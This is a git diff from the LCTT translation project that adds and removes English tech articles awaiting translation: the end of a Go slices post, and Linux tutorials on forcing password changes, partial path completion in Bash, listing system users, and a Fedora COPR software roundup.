You can see that at each level the value of `s` was unaffected by the operation of other callers of `f`, and that while four underlying arrays were created [6][10] higher levels of `f` in the call stack are unaffected by the copy and reallocation of new underlying arrays as a by-product of `append`.
|
||||||
|
|
||||||
|
### Further reading
|
||||||
|
|
||||||
|
If you want to find out more about how slices work in Go, I recommend these posts from the Go blog:
|
||||||
|
|
||||||
|
* [Go Slices: usage and internals][11] (blog.golang.org)
|
||||||
|
|
||||||
|
* [Arrays, slices (and strings): The mechanics of ‘append’][12] (blog.golang.org)
|
||||||
|
|
||||||
|
### Notes
|
||||||
|
|
||||||
|
1. This is not a unique property of arrays. In Go _every_ assignment is a copy.[][13]
|
||||||
|
|
||||||
|
2. You can also use `len` on array values, but the result is a forgone conclusion.[][14]
|
||||||
|
|
||||||
|
3. This is also known as the backing array or sometimes, less correctly, as the backing slice[][15]
|
||||||
|
|
||||||
|
4. In Go we tend to say value type and pointer type because of the confusion caused by C++’s _reference_ type, but in this case I think calling arrays as objects reference types is appropriate.[][16]
|
||||||
|
|
||||||
|
5. I’d argue if that struct has a [method defined on it and/or is used to satisfy an interface][17]then the percentage that you will pass around a pointer to your struct raises to near 100%.[][18]
|
||||||
|
|
||||||
|
6. Proof of this is left as an exercise to the reader.[][19]
|
||||||
|
|
||||||
|
### Related Posts:
|
||||||
|
|
||||||
|
1. [If a map isn’t a reference variable, what is it?][4]
|
||||||
|
|
||||||
|
2. [What is the zero value, and why is it useful ?][5]
|
||||||
|
|
||||||
|
3. [The empty struct][6]
|
||||||
|
|
||||||
|
4. [Should methods be declared on T or *T][7]
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://dave.cheney.net/2018/07/12/slices-from-the-ground-up
|
||||||
|
|
||||||
|
作者:[Dave Cheney][a]
|
||||||
|
译者:[译者ID](https://github.com/译者ID)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://dave.cheney.net/
|
||||||
|
[1]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-bottom-1-3265
|
||||||
|
[2]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-bottom-2-3265
|
||||||
|
[3]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-bottom-3-3265
|
||||||
|
[4]:https://dave.cheney.net/2017/04/30/if-a-map-isnt-a-reference-variable-what-is-it
|
||||||
|
[5]:https://dave.cheney.net/2013/01/19/what-is-the-zero-value-and-why-is-it-useful
|
||||||
|
[6]:https://dave.cheney.net/2014/03/25/the-empty-struct
|
||||||
|
[7]:https://dave.cheney.net/2016/03/19/should-methods-be-declared-on-t-or-t
|
||||||
|
[8]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-bottom-4-3265
|
||||||
|
[9]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-bottom-5-3265
|
||||||
|
[10]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-bottom-6-3265
|
||||||
|
[11]:https://blog.golang.org/go-slices-usage-and-internals
|
||||||
|
[12]:https://blog.golang.org/slices
|
||||||
|
[13]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-1-3265
|
||||||
|
[14]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-2-3265
|
||||||
|
[15]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-3-3265
|
||||||
|
[16]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-4-3265
|
||||||
|
[17]:https://dave.cheney.net/2016/03/19/should-methods-be-declared-on-t-or-t
|
||||||
|
[18]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-5-3265
|
||||||
|
[19]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-6-3265
|
||||||
|
[20]:https://golang.org/pkg/reflect/#SliceHeader
|
||||||
|
[21]:https://dave.cheney.net/2017/04/30/if-a-map-isnt-a-reference-variable-what-is-it
|
@ -1,162 +0,0 @@
|
|||||||
Translating by MjSeven
|
|
||||||
|
|
||||||
|
|
||||||
How To Force User To Change Password On Next Login In Linux
|
|
||||||
======
|
|
||||||
When you created the users account with a default password, you have to force the users to change their password on next login.
|
|
||||||
|
|
||||||
This option is mandatory when you were working in organization because old employees might know the default password and they may or may not try to malpractices.
|
|
||||||
|
|
||||||
This is one of the security complaint so, make sure you have to take care this in the proper way without any fail. Even your team members can do the same.
|
|
||||||
|
|
||||||
Most of the users are lazy and they don’t change their password until you force them to do so, make this practices.
|
|
||||||
|
|
||||||
For security reason you need to change your password frequently, or at-least once in a month.
|
|
||||||
|
|
||||||
Make sure you are using hard and guess password (The combination of Upper and Lower alphabets, Numbers, and Special characters) . It should be at-least 10-15 characters.
|
|
||||||
|
|
||||||
We have ran a shell script to create a user account in Linux server which automatically append a password for user, with combination of actual username followed by few numeric values.
|
|
||||||
|
|
||||||
We can achieve this by using the below two methods.
|
|
||||||
|
|
||||||
* passwd command
|
|
||||||
* chage command
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
**Suggested Read :**
|
|
||||||
**(#)** [How To Check Which Groups A User Belongs To On Linux][1]
|
|
||||||
**(#)** [How To Check User Created Date On Linux][2]
|
|
||||||
**(#)** [How To Reset/Change User Password In Linux][3]
|
|
||||||
**(#)** [How To Manage Password Expiration & Aging Using passwd Command][4]
|
|
||||||
|
|
||||||
### Method-1: Using passwd Command
|
|
||||||
|
|
||||||
passwd stands for password. It updates user’s authentication tokens. The passwd command/utility is used to set or modify or change users password.
|
|
||||||
|
|
||||||
Normal users are only allowed to change their own account but super users can change the password for any account.
|
|
||||||
|
|
||||||
Also, we can use an additional options which allows user to perform other activities such as deleting password for the user, lock/unlock the user account, set the password expiry for given user account, etc,.
|
|
||||||
|
|
||||||
This can be performed in Linux by calling the Linux-PAM and Libuser API.
|
|
||||||
|
|
||||||
Users details will be stored in /etc/passwd file when you created a user in Linux. The passwd file contain each/every user details as a single line with seven fields.
|
|
||||||
|
|
||||||
Also below four files will be updated while creating a new users in the Linux system.
|
|
||||||
|
|
||||||
* `/etc/passwd:` User details will be updated in this file.
|
|
||||||
* `/etc/shadow:` User password info will be updated in this file.
|
|
||||||
* `/etc/group:` Group details will be updated of the new user in this file.
|
|
||||||
* `/etc/gshadow:` Group password info will be updated of the new user in the file.
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
#### How To Perform This With passwd Command
|
|
||||||
|
|
||||||
We can perform this with passwd command by adding the `-e` option.
|
|
||||||
|
|
||||||
To test this, let’s create a new user account and see how it’s working.
|
|
||||||
```
|
|
||||||
# useradd -c "2g Admin - Magesh M" magesh && passwd magesh
|
|
||||||
Changing password for user magesh.
|
|
||||||
New password:
|
|
||||||
Retype new password:
|
|
||||||
passwd: all authentication tokens updated successfully.
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
Expire the password for the given user account. The user will be forced to change the password during the next login attempt.
|
|
||||||
```
|
|
||||||
# passwd -e magesh
|
|
||||||
Expiring password for user magesh.
|
|
||||||
passwd: Success
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
It’s asking me to set a new password when i’m trying to login to the system at first time.
|
|
||||||
```
|
|
||||||
login as: magesh
|
|
||||||
[email protected]'s password:
|
|
||||||
You are required to change your password immediately (root enforced)
|
|
||||||
WARNING: Your password has expired.
|
|
||||||
You must change your password now and login again!
|
|
||||||
Changing password for user magesh.
|
|
||||||
Changing password for magesh.
|
|
||||||
(current) UNIX password:
|
|
||||||
New password:
|
|
||||||
Retype new password:
|
|
||||||
passwd: all authentication tokens updated successfully.
|
|
||||||
Connection to localhost closed.
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
### Method-2: Using chage Command
|
|
||||||
|
|
||||||
chage stands for change age. It changes user password expiry information.
|
|
||||||
|
|
||||||
The chage command changes the number of days between password changes and the date of the last password change. This information is used by the system to determine when a user must change his/her password.
|
|
||||||
|
|
||||||
This allows user to perform other activities such as set account expiration date, set password inactive after expiration, show account aging information, set minimum & maximum number of days before password change and set expiration warning days.
|
|
||||||
|
|
||||||
#### How To Perform This With chage Command
|
|
||||||
|
|
||||||
Let’s perform this with help of chage command by adding the `-d` option.
|
|
||||||
|
|
||||||
To test this, let’s create a new user account and see how it’s working. We are going to create a user account called `thanu`.
|
|
||||||
```
|
|
||||||
# useradd -c "2g Editor - Thanisha M" thanu && passwd thanu
|
|
||||||
Changing password for user thanu.
|
|
||||||
New password:
|
|
||||||
Retype new password:
|
|
||||||
passwd: all authentication tokens updated successfully.
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
To achieve this, set a user’s date of last password change to “0” with the chage command.
|
|
||||||
```
|
|
||||||
# chage -d 0 thanu
|
|
||||||
|
|
||||||
# chage -l thanu
|
|
||||||
Last password change : Jul 18, 2018
|
|
||||||
Password expires : never
|
|
||||||
Password inactive : never
|
|
||||||
Account expires : never
|
|
||||||
Minimum number of days between password change : 0
|
|
||||||
Maximum number of days between password change : 99999
|
|
||||||
Number of days of warning before password expires : 7
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
It’s asking me to set a new password when i’m trying to login to the system at first time.
|
|
||||||
```
|
|
||||||
login as: thanu
|
|
||||||
[email protected]'s password:
|
|
||||||
You are required to change your password immediately (root enforced)
|
|
||||||
WARNING: Your password has expired.
|
|
||||||
You must change your password now and login again!
|
|
||||||
Changing password for user thanu.
|
|
||||||
Changing password for thanu.
|
|
||||||
(current) UNIX password:
|
|
||||||
New password:
|
|
||||||
Retype new password:
|
|
||||||
passwd: all authentication tokens updated successfully.
|
|
||||||
Connection to localhost closed.
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
|
||||||
|
|
||||||
via: https://www.2daygeek.com/how-to-force-user-to-change-password-on-next-login-in-linux/
|
|
||||||
|
|
||||||
作者:[Prakash Subramanian][a]
|
|
||||||
选题:[lujun9972](https://github.com/lujun9972)
|
|
||||||
译者:[译者ID](https://github.com/译者ID)
|
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
|
||||||
|
|
||||||
[a]:https://www.2daygeek.com/author/prakash/
|
|
||||||
[1]:https://www.2daygeek.com/how-to-check-which-groups-a-user-belongs-to-on-linux/
|
|
||||||
[2]:https://www.2daygeek.com/how-to-check-user-created-date-on-linux/
|
|
||||||
[3]:https://www.2daygeek.com/passwd-command-examples/
|
|
||||||
[4]:https://www.2daygeek.com/passwd-command-examples-part-l/
|
|
@ -0,0 +1,84 @@
|
|||||||
|
translating---geekpi
|
||||||
|
|
||||||
|
Incomplete Path Expansion (Completion) For Bash
|
||||||
|
======
|
||||||
|
|
||||||
|
![](https://4.bp.blogspot.com/-k2pRIKTzcBU/W1BpFtzzWuI/AAAAAAAABOE/pqX4XcOX8T4NWkKOmzD0T0OioqxzCmhLgCLcBGAs/s1600/Gnu-bash-logo.png)
|
||||||
|
|
||||||
|
[bash-complete-partial-path][1] enhances the path completion in Bash (on Linux, macOS with gnu-sed, and Windows with MSYS) by adding incomplete path expansion, similar to Zsh. This is useful if you want this time-saving feature in Bash, without having to switch to Zsh.
|
||||||
|
|
||||||
|
Here is how this works. When the `Tab` key is pressed, bash-complete-partial-path assumes each component is incomplete and tries to expand it. Let's say you want to navigate to `/usr/share/applications` . You can type `cd /u/s/app` , press `Tab` , and bash-complete-partial-path should expand it into `cd /usr/share/applications` . If there are conflicts, only the path without conflicts is completed upon pressing `Tab` . For instance Ubuntu users should have quite a few folders in `/usr/share` that begin with "app" so in this case, typing `cd /u/s/app` will only expand the `/usr/share/` part.
|
||||||
|
|
||||||
|
Here is another example of deeper incomplete file path expansion. On an Ubuntu system type `cd /u/s/f/t/u` , press `Tab` , and it should be automatically expanded to cd `/usr/share/fonts/truetype/ubuntu` .
|
||||||
|
|
||||||
|
Features include:
|
||||||
|
|
||||||
|
* Escapes special characters
|
||||||
|
|
||||||
|
* If the user starts the path with quotes, character escaping is not applied and instead, the quote is closed with a matching character after expending the path
|
||||||
|
|
||||||
|
* Properly expands ~ expressions
|
||||||
|
|
||||||
|
* If bash-completion package is already in use, this code will safely override its _filedir function. No extra configuration is required, just make sure you source this project after the main bash-completion.
|
||||||
|
|
||||||
|
Check out the [project page][2] for more information and a demo screencast.
|
||||||
|
|
||||||
|
### Install bash-complete-partial-path
|
||||||
|
|
||||||
|
The bash-complete-partial-path installation instructions specify downloading the bash_completion script directly. I prefer to grab the Git repository instead, so I can update it with a simple `git pull` , therefore the instructions below will use this method of installing bash-complete-partial-path. You can use the [official][3] instructions if you prefer them.
|
||||||
|
|
||||||
|
1. Install Git (needed to clone the bash-complete-partial-path Git repository).
|
||||||
|
|
||||||
|
In Debian, Ubuntu, Linux Mint and so on, use this command to install Git:
|
||||||
|
|
||||||
|
```
|
||||||
|
sudo apt install git
|
||||||
|
```
|
||||||
|
|
||||||
|
2. Clone the bash-complete-partial-path Git repository in `~/.config/`:
|
||||||
|
|
||||||
|
```
|
||||||
|
cd ~/.config && git clone https://github.com/sio/bash-complete-partial-path
|
||||||
|
```
|
||||||
|
|
||||||
|
3. Source `~/.config/bash-complete-partial-path/bash_completion` in your `~/.bashrc` file,
|
||||||
|
|
||||||
|
Open ~/.bashrc with a text editor. You can use Gedit for example:
|
||||||
|
|
||||||
|
```
|
||||||
|
gedit ~/.bashrc
|
||||||
|
```
|
||||||
|
|
||||||
|
At the end of the `~/.bashrc` file add the following (as a single line):
|
||||||
|
|
||||||
|
```
|
||||||
|
[ -s "$HOME/.config/bash-complete-partial-path/bash_completion" ] && source "$HOME/.config/bash-complete-partial-path/bash_completion"
|
||||||
|
```
|
||||||
|
|
||||||
|
I mentioned adding it at the end of the file because this needs to be included below (after) the main bash-completion from your `~/.bashrc` file. So make sure you don't add it above the original bash-completion as it will cause issues.
|
||||||
|
|
||||||
|
4\. Source `~/.bashrc`:
|
||||||
|
|
||||||
|
```
|
||||||
|
source ~/.bashrc
|
||||||
|
```
|
||||||
|
|
||||||
|
And you're done, bash-complete-partial-path should now be installed and ready to be used.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://www.linuxuprising.com/2018/07/incomplete-path-expansion-completion.html
|
||||||
|
|
||||||
|
作者:[Logix][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[译者ID](https://github.com/译者ID)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://plus.google.com/118280394805678839070
|
||||||
|
[1]:https://github.com/sio/bash-complete-partial-path
|
||||||
|
[2]:https://github.com/sio/bash-complete-partial-path
|
||||||
|
[3]:https://github.com/sio/bash-complete-partial-path#installation-and-updating
|
@ -0,0 +1,235 @@
|
|||||||
|
3 Methods to List All The Users in Linux System
|
||||||
|
======
|
||||||
|
Everyone knows user information was residing in `/etc/passwd` file.
|
||||||
|
|
||||||
|
It’s a text file that contains the essential information about each user.
|
||||||
|
|
||||||
|
When we create a new user, the new user details will be appended into this file.
|
||||||
|
|
||||||
|
The /etc/passwd file contains each user essential information as a single line with seven fields.
|
||||||
|
|
||||||
|
Each line in /etc/passwd represents a single user. This file keep the user’s information in three parts.
|
||||||
|
|
||||||
|
* `Part-1:` root user information
|
||||||
|
* `Part-2:` system-defined accounts information
|
||||||
|
* `Part-3:` Real user information
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**Suggested Read :**
|
||||||
|
**(#)** [How To Check User Created Date On Linux][1]
|
||||||
|
**(#)** [How To Check Which Groups A User Belongs To On Linux][2]
|
||||||
|
**(#)** [How To Force User To Change Password On Next Login In Linux][3]
|
||||||
|
|
||||||
|
The first part is the root account, which is administrator account has complete power over every aspect of the system.
|
||||||
|
|
||||||
|
The second part is followed by system-defined groups and accounts that are required for proper installation and update of system software.
|
||||||
|
|
||||||
|
The third part at the end represent real people who use the system.
|
||||||
|
|
||||||
|
While creating a new users the below four files will be modified.
|
||||||
|
|
||||||
|
* `/etc/passwd:` User details will be updated in this file.
|
||||||
|
* `/etc/shadow:` User password info will be updated in this file.
|
||||||
|
* `/etc/group:` Group details will be updated of the new user in this file.
|
||||||
|
* `/etc/gshadow:` Group password info will be updated of the new user in the file.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
### Method-1: Using /etc/passwd file
|
||||||
|
|
||||||
|
Use any of the file manipulation command such as cat, more, less, etc to print the list of users were created on your Linux system.
|
||||||
|
|
||||||
|
The `/etc/passwd` is a text file that contains each user information, which is necessary to login Linux system. It maintain useful information about users such as username, password, user ID, group ID, user ID info, home directory and shell.
|
||||||
|
|
||||||
|
The /etc/passwd file contain every user details as a single line with seven fields as described below, each fields separated by colon “:”
|
||||||
|
```
|
||||||
|
# cat /etc/passwd
|
||||||
|
root:x:0:0:root:/root:/bin/bash
|
||||||
|
bin:x:1:1:bin:/bin:/sbin/nologin
|
||||||
|
daemon:x:2:2:daemon:/sbin:/sbin/nologin
|
||||||
|
adm:x:3:4:adm:/var/adm:/sbin/nologin
|
||||||
|
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
|
||||||
|
sync:x:5:0:sync:/sbin:/bin/sync
|
||||||
|
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
|
||||||
|
halt:x:7:0:halt:/sbin:/sbin/halt
|
||||||
|
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
|
||||||
|
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
|
||||||
|
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
|
||||||
|
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
|
||||||
|
tcpdump:x:72:72::/:/sbin/nologin
|
||||||
|
2gadmin:x:500:10::/home/viadmin:/bin/bash
|
||||||
|
apache:x:48:48:Apache:/var/www:/sbin/nologin
|
||||||
|
zabbix:x:498:499:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
|
||||||
|
mysql:x:497:502::/home/mysql:/bin/bash
|
||||||
|
zend:x:502:503::/u01/zend/zend/gui/lighttpd:/sbin/nologin
|
||||||
|
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
|
||||||
|
2daygeek:x:503:504::/home/2daygeek:/bin/bash
|
||||||
|
named:x:25:25:Named:/var/named:/sbin/nologin
|
||||||
|
mageshm:x:506:507:2g Admin - Magesh M:/home/mageshm:/bin/bash
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Below are the detailed information about seven fields.
|
||||||
|
|
||||||
|
* **`Username (magesh):`** Username of created user. Characters length should be between 1 to 32.
|
||||||
|
* **`Password (x):`** It indicates that encrypted password is stored at /etc/shadow file.
|
||||||
|
* **`User ID (UID-506):`** It indicates the user ID (UID) each user should be contain unique UID. UID (0-Zero) is reserved for root, UID (1-99) reserved for system users and UID (100-999) reserved for system accounts/groups
|
||||||
|
* **`Group ID (GID-507):`** It indicates the group ID (GID) each group should be contain unique GID is stored at /etc/group file.
|
||||||
|
* **`User ID Info (2g Admin - Magesh M):`** It indicates the command field. This field can be used to describe the user information.
|
||||||
|
* **`Home Directory (/home/mageshm):`** It indicates the user home directory.
|
||||||
|
* **`shell (/bin/bash):`** It indicates the user’s bash shell.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
You can use the **awk** or **cut** command to print only the user names list on your Linux system. Both are showing the same results.
|
||||||
|
```
|
||||||
|
# awk -F':' '{ print $1}' /etc/passwd
|
||||||
|
or
|
||||||
|
# cut -d: -f1 /etc/passwd
|
||||||
|
root
|
||||||
|
bin
|
||||||
|
daemon
|
||||||
|
adm
|
||||||
|
lp
|
||||||
|
sync
|
||||||
|
shutdown
|
||||||
|
halt
|
||||||
|
mail
|
||||||
|
ftp
|
||||||
|
postfix
|
||||||
|
sshd
|
||||||
|
tcpdump
|
||||||
|
2gadmin
|
||||||
|
apache
|
||||||
|
zabbix
|
||||||
|
mysql
|
||||||
|
zend
|
||||||
|
rpc
|
||||||
|
2daygeek
|
||||||
|
named
|
||||||
|
mageshm
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
### Method-2: Using getent Command
|
||||||
|
|
||||||
|
The getent command displays entries from databases supported by the Name Service Switch libraries, which are configured in /etc/nsswitch.conf.
|
||||||
|
|
||||||
|
getent command shows user details similar to /etc/passwd file, it shows every user details as a single line with seven fields.
|
||||||
|
```
|
||||||
|
# getent passwd
|
||||||
|
root:x:0:0:root:/root:/bin/bash
|
||||||
|
bin:x:1:1:bin:/bin:/sbin/nologin
|
||||||
|
daemon:x:2:2:daemon:/sbin:/sbin/nologin
|
||||||
|
adm:x:3:4:adm:/var/adm:/sbin/nologin
|
||||||
|
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
|
||||||
|
sync:x:5:0:sync:/sbin:/bin/sync
|
||||||
|
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
|
||||||
|
halt:x:7:0:halt:/sbin:/sbin/halt
|
||||||
|
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
|
||||||
|
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
|
||||||
|
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
|
||||||
|
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
|
||||||
|
tcpdump:x:72:72::/:/sbin/nologin
|
||||||
|
2gadmin:x:500:10::/home/viadmin:/bin/bash
|
||||||
|
apache:x:48:48:Apache:/var/www:/sbin/nologin
|
||||||
|
zabbix:x:498:499:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
|
||||||
|
mysql:x:497:502::/home/mysql:/bin/bash
|
||||||
|
zend:x:502:503::/u01/zend/zend/gui/lighttpd:/sbin/nologin
|
||||||
|
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
|
||||||
|
2daygeek:x:503:504::/home/2daygeek:/bin/bash
|
||||||
|
named:x:25:25:Named:/var/named:/sbin/nologin
|
||||||
|
mageshm:x:506:507:2g Admin - Magesh M:/home/mageshm:/bin/bash
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Below are the detailed information about seven fields.
|
||||||
|
|
||||||
|
* **`Username (magesh):`** Username of created user. Characters length should be between 1 to 32.
|
||||||
|
* **`Password (x):`** It indicates that encrypted password is stored at /etc/shadow file.
|
||||||
|
* **`User ID (UID-506):`** It indicates the user ID (UID) each user should be contain unique UID. UID (0-Zero) is reserved for root, UID (1-99) reserved for system users and UID (100-999) reserved for system accounts/groups
|
||||||
|
* **`Group ID (GID-507):`** It indicates the group ID (GID) each group should be contain unique GID is stored at /etc/group file.
|
||||||
|
* **`User ID Info (2g Admin - Magesh M):`** It indicates the command field. This field can be used to describe the user information.
|
||||||
|
* **`Home Directory (/home/mageshm):`** It indicates the user home directory.
|
||||||
|
* **`shell (/bin/bash):`** It indicates the user’s bash shell.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
You can use the **awk** or **cut** command to print only the user names list on your Linux system. Both are showing the same results.
|
||||||
|
```
|
||||||
|
# getent passwd | awk -F':' '{ print $1}'
|
||||||
|
or
|
||||||
|
# getent passwd | cut -d: -f1
|
||||||
|
root
|
||||||
|
bin
|
||||||
|
daemon
|
||||||
|
adm
|
||||||
|
lp
|
||||||
|
sync
|
||||||
|
shutdown
|
||||||
|
halt
|
||||||
|
mail
|
||||||
|
ftp
|
||||||
|
postfix
|
||||||
|
sshd
|
||||||
|
tcpdump
|
||||||
|
2gadmin
|
||||||
|
apache
|
||||||
|
zabbix
|
||||||
|
mysql
|
||||||
|
zend
|
||||||
|
rpc
|
||||||
|
2daygeek
|
||||||
|
named
|
||||||
|
mageshm
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
### Method-3: Using compgen Command
|
||||||
|
|
||||||
|
compgen is bash built-in command and it will show all available commands, aliases, and functions for you.
|
||||||
|
```
|
||||||
|
# compgen -u
|
||||||
|
root
|
||||||
|
bin
|
||||||
|
daemon
|
||||||
|
adm
|
||||||
|
lp
|
||||||
|
sync
|
||||||
|
shutdown
|
||||||
|
halt
|
||||||
|
mail
|
||||||
|
ftp
|
||||||
|
postfix
|
||||||
|
sshd
|
||||||
|
tcpdump
|
||||||
|
2gadmin
|
||||||
|
apache
|
||||||
|
zabbix
|
||||||
|
mysql
|
||||||
|
zend
|
||||||
|
rpc
|
||||||
|
2daygeek
|
||||||
|
named
|
||||||
|
mageshm
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Please comment your inputs into our comment section, so based on that we can improve our blog and make effective article. So, stay tune with us.
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://www.2daygeek.com/3-methods-to-list-all-the-users-in-linux-system/
|
||||||
|
|
||||||
|
作者:[Magesh Maruthamuthu][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[译者ID](https://github.com/译者ID)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://www.2daygeek.com/author/magesh/
|
||||||
|
[1]:https://www.2daygeek.com/how-to-check-user-created-date-on-linux/
|
||||||
|
[2]:https://www.2daygeek.com/how-to-check-which-groups-a-user-belongs-to-on-linux/
|
||||||
|
[3]:https://www.2daygeek.com/how-to-force-user-to-change-password-on-next-login-in-linux/
|
@ -0,0 +1,88 @@
|
|||||||
|
4 cool new projects to try in COPR for July 2018
|
||||||
|
======
|
||||||
|
|
||||||
|
![](https://fedoramagazine.org/wp-content/uploads/2017/08/4-copr-945x400.jpg)
|
||||||
|
|
||||||
|
COPR is a [collection][1] of personal repositories for software that isn’t carried in Fedora. Some software doesn’t conform to standards that allow easy packaging. Or it may not meet other Fedora standards, despite being free and open source. COPR can offer these projects outside the Fedora set of packages. Software in COPR isn’t supported by Fedora infrastructure or signed by the project. However, it can be a neat way to try new or experimental software.
|
||||||
|
|
||||||
|
Here’s a set of new and interesting projects in COPR.
|
||||||
|
|
||||||
|
### Hledger
|
||||||
|
|
||||||
|
[Hledger][2] is a command-line program for tracking money or other commodities. It uses a simple, plain-text formatted journal for storing data and double-entry accounting. In addition to the command-line interface, hledger offers a terminal interface and a web client that can show graphs of balance on the accounts.
|
||||||
|
![][3]
|
||||||
|
|
||||||
|
#### Installation instructions
|
||||||
|
|
||||||
|
The repo currently provides hledger for Fedora 27, 28, and Rawhide. To install hledger, use these commands:
|
||||||
|
```
|
||||||
|
sudo dnf copr enable kefah/HLedger
|
||||||
|
sudo dnf install hledger
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
### Neofetch
|
||||||
|
|
||||||
|
[Neofetch][4] is a command-line tool that displays information about the operating system, software, and hardware. Its main purpose is to show the data in a compact way to take screenshots. You can configure Neofetch to display exactly the way you want, by using both command-line flags and a configuration file.
|
||||||
|
![][5]
|
||||||
|
|
||||||
|
#### Installation instructions
|
||||||
|
|
||||||
|
The repo currently provides Neofetch for Fedora 28. To install Neofetch, use these commands:
|
||||||
|
```
|
||||||
|
sudo dnf copr enable sysek/neofetch
|
||||||
|
sudo dnf install neofetch
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
### Remarkable
|
||||||
|
|
||||||
|
[Remarkable][6] is a Markdown text editor that uses the GitHub-like flavor of Markdown. It offers a preview of the document, as well as the option to export to PDF and HTML. There are several styles available for the Markdown, including an option to create your own styles using CSS. In addition, Remarkable supports LaTeX syntax for writing equations and syntax highlighting for source code.
|
||||||
|
![][7]
|
||||||
|
|
||||||
|
#### Installation instructions
|
||||||
|
|
||||||
|
The repo currently provides Remarkable for Fedora 28 and Rawhide. To install Remarkable, use these commands:
|
||||||
|
```
|
||||||
|
sudo dnf copr enable neteler/remarkable
|
||||||
|
sudo dnf install remarkable
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
### Aha
|
||||||
|
|
||||||
|
[Aha][8] (or ANSI HTML Adapter) is a command-line tool that converts terminal escape sequences to HTML code. This allows you to share, for example, output of git diff or htop as a static HTML page.
|
||||||
|
![][9]
|
||||||
|
|
||||||
|
#### Installation instructions
|
||||||
|
|
||||||
|
The [repo][10] currently provides aha for Fedora 26, 27, 28, and Rawhide, EPEL 6 and 7, and other distributions. To install aha, use these commands:
|
||||||
|
```
|
||||||
|
sudo dnf copr enable scx/aha
|
||||||
|
sudo dnf install aha
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://fedoramagazine.org/4-try-copr-july-2018/
|
||||||
|
|
||||||
|
作者:[Dominik Turecek][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[译者ID](https://github.com/译者ID)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
